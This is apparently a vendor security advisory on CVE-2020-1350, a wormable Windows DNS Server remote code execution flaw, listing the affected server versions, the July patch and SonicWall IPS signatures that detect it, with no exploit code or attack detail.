A remote code execution vulnerability exists in Windows Domain Name System servers when certain requests are not properly handled. This issue results from a flaw in Microsoft’s DNS server role implementation. An attacker who successfully exploits the vulnerability could run arbitrary code in the context of the Local System Account. Windows servers that are configured as DNS servers are at risk as a result of this vulnerability.

To exploit the vulnerability, an unauthenticated attacker could send malicious requests to a Windows DNS server.

This vulnerability (CVE-2020-1350) is classified as a ‘wormable’ vulnerability and has a CVSS base score of 10. Wormable vulnerabilities have the potential to spread via malware between vulnerable computers without user interaction.

This issue affects the following Windows Server versions. Non-Microsoft DNS Servers are not affected.

  • Microsoft Windows Server 2008
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016
  • Microsoft Windows Server 2019
  • Microsoft Windows Server version 1803 (Server Core installation)
  • Microsoft Windows Server version 1903 (Server Core installation)
  • Microsoft Windows Server version 1909 (Server Core installation)
  • Microsoft Windows Server version 2004 (Server Core installation)

Microsoft has patched this vulnerability in its July patch Tuesday updates. Users are encouraged to patch their systems as soon as possible.

SonicWall Capture Labs provides protection against this threat via the following signature:

      • IPS 15069: Windows DNS Server Remote Code Execution (CVE-2020-1350) 1
      • IPS 15073: Windows DNS Server Remote Code Execution (CVE-2020-1350) 2
      • IPS 15074: Windows DNS Server Remote Code Execution (CVE-2020-1350) 3
      • IPS 15075: Windows DNS Server Remote Code Execution (CVE-2020-1350) 4
      • IPS 15076: Windows DNS Server Remote Code Execution (CVE-2020-1350) 5